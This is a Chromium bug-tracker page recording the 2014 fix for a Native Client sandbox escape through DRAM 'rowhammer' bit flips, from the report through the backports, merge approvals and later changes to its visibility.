New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
User never visited
Closed: Oct 2014
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Blocked on:
issue nativeclient:3944



Sign in to add a comment

Security: NaCl sandbox escape via DRAM "rowhammer" memory corruption

Project Member Reported by mseaborn@chromium.org, Oct 7 2014

Issue description

This is a Chromium tracking issue for  issue nativeclient:3944 .

Recent research indicated that DRAM can be corrupted by a problem called "rowhammer": https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf

This turns out to be exploitable.  I can reproduce memory corruption on a Thinkpad T420s laptop.  Furthermore, I've written an example exploit program that can escape from NaCl's SFI sandbox by causing bit flips that turn safe, validated code into unsafe code.

This worked because NaCl allowed the x86 "clflush" instruction.  We've changed NaCl to disallow this instruction on trunk (see  issue nativeclient:3944 ).

I think we should backport this fix to other branches of Chrome.

 
Labels: Security_Severity-High Security_Impact-Stable
Status: Available
Owner: shyamsundarr@chromium.org
Status: Assigned
Awaiting Brad Nelson's assistance to help with backporting a NaCl change.
Project Member

Comment 3 by bugdroid1@chromium.org, Oct 14 2014

Labels: merge-merged-2171
The following revision refers to this bug:
  http://goto.ext.google.com/viewvc/chrome-internal?view=rev&revision=62766

------------------------------------------------------------------
r62766 | bradnelson@google.com | 2014-10-14T19:17:34.673733Z

-----------------------------------------------------------------
Cc: matthewyuan@chromium.org matthewyuan@google.com
Hi Matthew, continuing the email thread here. Let us know if you approve backporting this bugfix into M38/2125 ? Thanks.
Labels: M-39 M-38 Merge-Approved
Merge Approved for M38.
Project Member

Comment 6 by ClusterFuzz, Oct 24 2014

Labels: Nag
shyamsundarr@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are to unable to reproduce it, please close the bug. (And thanks for fixing the bug!).

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz
Cc: amin...@google.com amineer@chromium.org
Brads' changes:

http://chromegw.corp.google.com/viewvc/chrome-internal?view=rev&revision=62766

and

http://chromegw.corp.google.com/viewvc/chrome-internal?view=rev&revision=62917

should have brought in the Nacl fixes into beta/stable respectively. 

Alex/Matt, do we need to do anything to kick off a chromium build/release with these changes or will it be automatic?

Comment 8 by amin...@google.com, Oct 24 2014

Re: beta, the DEPS roll should have been picked up earlier this week, and the latest beta (39.0.2171.36) should already have these changes included.
Labels: -M-38 -Merge-Approved -Nag Release-0-M39
Status: Fixed
Project Member

Comment 10 by ClusterFuzz, Oct 31 2014

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Cc: jfb@chromium.org
Labels: CVE-2015-0565
Project Member

Comment 12 by ClusterFuzz, Feb 6 2015

Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.
Labels: Restrict-View-SecurityEmbargo
Labels: -Restrict-View-SecurityEmbargo
Changing issue to publicly accessible based on http://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
Project Member

Comment 15 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 16 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-missing

Sign in to add a comment